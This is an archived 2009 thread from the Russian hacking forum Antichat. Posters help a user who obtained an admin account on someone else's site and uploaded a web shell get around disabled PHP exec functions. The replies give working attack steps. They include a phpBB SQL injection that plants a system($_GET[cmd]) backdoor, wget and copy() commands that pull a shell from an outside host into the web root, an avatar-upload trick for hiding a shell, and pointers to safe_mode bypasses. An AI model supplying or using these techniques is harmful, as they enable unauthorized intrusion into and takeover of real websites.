ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
30.06.2009, 13:34
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Vish
Получил я админский акк от булки, залил шелл и мне вылетела не приятная надпись:
Warning: shell_exec() has been disabled for security reasons in /faq.php(302) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 361
Пробовал проинклудить, тож ни чего не получилось, всё отключено, system() тоже...
Есть ли в такой ситуации возможность просмотреть конфиг ?
1 залить другой шелл на пхп
2 залить шелл на другом языке, например на перле
3 покурить тему safe_mode bypass. есть даже видео от BlackSun
4 если надо только прочесть файл, то не обязательно иметь полноценный шелл с исполнение команд, можно просто сделать fopen. главное чтобы прав хватило.
|
|
|
30.06.2009, 13:41
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
Сообщение от Vish
Получил я админский акк от булки, залил шелл и мне вылетела не приятная надпись:
Warning: shell_exec() has been disabled for security reasons in /faq.php(302) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 361
Пробовал проинклудить, тож ни чего не получилось, всё отключено, system() тоже...
Есть ли в такой ситуации возможность просмотреть конфиг ?
passthru(); ну или fopen(); copy();
|
|
|
|
30.06.2009, 20:40
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
phpinfo();
если в нём allow_url_fopen=on, делай copy('http:///ww.site.com/shell.txt','/tmp/shell.php');
потом инклудишь его
если off, смотриш на сейф мод, на дизейбл функшнс, там уже по обстоятельствам
|
|
|
|
30.06.2009, 22:17
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
Залил шелл через phpbb, с помощью востановления базы.......
PHP код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[cmd])' WHERE user_id=2;
Пытаюсь залить madshell в папку /var/www/images/ (права есть).....
делаю так,
PHP код:
http://site.com/forum/profile.php?mode=editprofile&cmd=wget%20http://host.com/papka/shell.php%20-o%20/var/www/images/tyrytrytr.php
файл создался, но в ответ при открытие я получаю,
Код:
--17:50:03-- http://host.com/papka/shell.php => `shell.php' Resolving host.com... xx.xx.xx.xx Connecting to host.com[xx.xx.xx.xx]:80... failed: Connection timed out.
-------------------
Почему так???Что такое?? |
|
|
|
30.06.2009, 22:24
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Время подключения к хосту превышено, попробуй воспользоваться шеллом с другого сайта
|
|
|
|
30.06.2009, 22:34
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
я пробовал c madnet.name, freehostia, и со своих шеллов, не хочет что то
|
|
|
|
30.06.2009, 22:40
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Ну для начала можно научится юзать wget:
wget http://site.ru/1.txt -O shell.php - это сохранит скаченный файл с указанным именем
а не:
wget http://site.ru/1.txt -o shell.php - это поместит лог работы в указанный файл
Только если хост тормознутый, то это не лучший способ - загрузи аватарку с шеллом, а потом просто поменяй расширение на пхп.
|
|
|
|
30.06.2009, 23:12
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
Сообщение от Grey
Ну для начала можно научится юзать wget:
wget http://site.ru/1.txt -O shell.php - это сохранит скаченный файл с указанным именем
а не:
wget http://site.ru/1.txt -o shell.php - это поместит лог работы в указанный файл
Только если хост тормознутый, то это не лучший способ - загрузи аватарку с шеллом, а потом просто поменяй расширение на пхп.
в данном случае нельзя грузить аватары, chmod на аватарки и images, cache, и все другое, доступны для записи только папки в корне сайта, но при
wget http://site.ru/1.txt -O shell.php , просто создается пустой файл нечего не качается....
|
|
|
|
30.06.2009, 23:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
врятли) разницы не вижу даже при substring'e
|
|
|
|
30.06.2009, 23:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
cmd=copy('site/shell.txt', 'полный путь до папки drwrwrw/shell.php');
а чем тебе так не лучше?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид